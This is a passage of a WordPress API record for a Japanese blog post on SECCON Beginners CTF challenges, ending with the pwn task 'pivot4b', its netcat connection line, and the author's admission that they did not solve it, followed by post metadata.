pivot4b<\/h2>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u30b9\u30bf\u30c3\u30af\u306f\u3042\u306a\u305f\u304c\u5275\u308a\u51fa\u3059\u3082\u306e\u3067\u3059\u3002<\/p>\n\n\n\n<p><code>nc pivot4b.challenges.beginners.seccon.jp 
12300<\/code><\/p>\n<\/blockquote>\n\n\n\n<p>pwn\u3078\u305f\u304f\u305d\u30de\u30f3\u306f\u89e3\u3051\u306a\u304b\u3063\u305f\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u89e3\u3044\u305f\u306e\u3060\u3051<\/p>\n","protected":false},"author":1,"featured_media":1228,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"cybocfi_hide_featured_image":"yes","footnotes":""},"categories":[14],"tags":[8,23],"class_list":["post-1203","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ctf","tag-ctf","tag-seccon"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/emeth.jp\/diary\/wp-json\/wp\/v2\/posts\/1203","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/emeth.jp\/diary\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/emeth.jp\/diary\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/emeth.jp\/diary\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/emeth.jp\/diary\/wp-json\/wp\/v2\/comments?post=1203"}],"version-history":[{"count":5,"href":"https:\/\/emeth.jp\/diary\/wp-json\/wp\/v2\/posts\/1203\/revisions"}],"predecessor-version":[{"id":1229,"href":"https:\/\/emeth.jp\/diary\/wp-json\/wp\/v2\/posts\/1203\/revisions\/1229"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/emeth.jp\/diary\/wp-json\/wp\/v2\/media\/1228"}],"wp:attachment":[{"href":"https:\/\/emeth.jp\/diary\/wp-json\/wp\/v2\/media?parent=1203"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/emeth.jp\/diary\/wp-json\/wp\/v2\/categories?post=1203"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/emeth.jp\/diary\/wp-json\/wp\/v2\/tags?post=1203"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}